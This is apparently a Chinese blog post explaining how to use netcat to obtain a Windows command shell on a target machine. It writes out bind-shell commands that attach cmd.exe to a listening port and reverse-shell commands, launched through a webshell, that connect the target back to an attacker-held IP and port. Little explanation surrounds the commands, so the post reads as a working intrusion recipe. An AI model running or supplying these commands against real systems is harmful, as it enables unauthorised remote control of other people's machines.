使用nc获取cmdshell

NetCat简称nc

正向连接的方式就是在目标主机上绑定一个端口,当有客户端连接过来的时候就把该连接请求转向cmd.exe来处理,从而客户端获取一个类型命令提示符的执行环境

执行命令:

CMD路径:c:\windows\system32\cmd.exe

1.语句:\c D:\wwwroot\case1\nc.exe -l -p 8888 -t -e cmd.exe

2.客户端直接使用telnet连接就可获得一个cmdshell权限:Telnet 172.16.156.77

反向连接的方式是客户端主动开启一个端口等待目标主机来连接,连接成功后将客户端要执行的命令转交给目标的cmd.exe来处理

1.本地执行:c:\nc -vv -l -p 12345   //监听端口

2.webshell执行:

CMD路径:c:\windows\system32\cmd.exe

语句:\c D:\wwwroot\case1\nc.exe 172.16.156.22 1234 -e cmd.exe   //本地ip

3.监听方获取一个反向连接过来的cmdshell




评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值